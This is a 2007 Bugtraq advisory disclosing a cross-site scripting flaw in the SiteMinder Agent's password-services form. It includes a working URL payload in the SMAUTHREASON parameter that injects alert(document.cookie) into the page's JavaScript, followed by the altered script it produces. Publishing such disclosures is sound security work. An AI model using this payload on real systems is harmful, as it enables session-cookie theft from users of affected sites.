SiteMinder Agent: Cross Site Scripting
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: SiteMinder Agent: Cross Site Scripting
- From: "Giuseppe Gottardi" <overet@xxxxxxxxxxxxxxx>
- Date: Wed, 7 Nov 2007 04:10:00 +0100
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:sender:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition:x-google-sender-auth; bh=KppSGyQfCex2cfBD5GUPubCfoLSi9UwsUcgL/PJwyFY=; b=PQSB4SmYEW9MgdNN/vH0Hq24x+krcB01fHr32ok9D/XkS/UpliYAmJkHQPgg6lEQ2H5Xywy6TJ5t2OR3HEm5NjLjqPj1FfW7mjCD5zSeQmUJvhUrLiqIeFaD4Y409UJ2o5K0g9TN/o1KrMlaK+kUsv0heHu3OsccQWfl/YLycHY=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:sender:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition:x-google-sender-auth; b=cc0kC7aa8wKRdtMqa1eteQ1lVyQ1WtpMCdU5uL0x/hvQFWg+I9GB+KjelzhB2kVWxH0fs7e154xHX2vNJcxntABCEpyF7U/NanJEm4rcZJZuTnuw7X8ZGMQ8pnNRs3GIii4yeC56VOUC/CakuKlkqdalF1mF+srpqsZNmLFFz3c=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
- Sender: overet@xxxxxxxxx
# Exploit in [XSS]:
https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=[XSS]
# Cross Site Scripting (Code):
https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0
In this way we can inject the alert() code without brackets in the
function resetCredFields().
-------------------------------
function resetCredFields()
{
if (1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 0 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 4 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 5 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 28 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 30 )
{
document.PWChange.PASSWORD.value = '';
}
else if (1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 1 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 18 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 20 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 22 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 31 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 34)
{
document.PWChange.NEWPASSWORD.value = '';
document.PWChange.CONFIRMATION.value = '';
}
}
...
<BODY bgcolor='#ffffff' text='#000000' onLoad = 'resetCredFields();'>
-------------------------------
Regards,
Giuseppe Gottardi (aka oveRet)
---
Giuseppe Gottardi
Senior Security Engineer at Communication Valley S.p.A.
E-mail: overet@xxxxxxxxxxxxxxx
Web: http://overet.securitydate.it
Wednesday November 07, 2007.